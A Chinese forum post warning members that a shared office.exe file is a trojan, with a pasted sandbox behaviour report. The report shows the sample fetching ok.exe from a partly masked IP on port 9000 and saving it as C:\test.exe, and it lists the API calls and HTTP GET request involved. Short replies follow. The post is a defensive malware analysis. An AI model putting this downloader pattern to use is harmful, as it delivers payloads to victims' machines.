|
|
这位兄弟,你弄个office.exe在里面干嘛,想套路别人,你想监听别人电脑?你想多了吧,你hfc地址我就不报你的了。以下是木马程序分析结果。各位兄弟长点心。
网络行为
行为描述:网络行为
行为描述: 下载文件
详情信息:
URLDownloadToFileW: http://**.255.219.**:9000/ok.exe ---> C:\test.exe
C:\test.exe
行为描述: 连接指定站点
详情信息:
InternetConnectA: ServerName = **.255.219.**, PORT = 9000, UserName = , Password = , hSession = 0x00cc0004, hConnect = 0x00cc0008, Flags = 0x00000000
行为描述: 打开HTTP连接
详情信息:
InternetOpenA: UserAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489), hSession = 0x00cc0004
行为描述: 建立到一个指定的套接字连接
详情信息:
IP: **.255.219.**:9000, SOCKET = 0x00000258
行为描述: 读取网络文件
详情信息:
hFile = 0x00cc000c, BytesToRead =2048, BytesRead = 2048.
行为描述: 发送HTTP包
详情信息:
GET /ok.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: **.255.219.**:9000 Connection: Keep-Alive
行为描述: 打开HTTP请求
详情信息:
HttpOpenRequestA: **.255.219.**:9000/ok.exe, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400010
|
|
[复制链接]
/1 
好评
贡献
海币
交易币
发表于 2018-1-19 01:13:06
学习学习
照妖镜
为什么要先打开iEXE呢
..........................
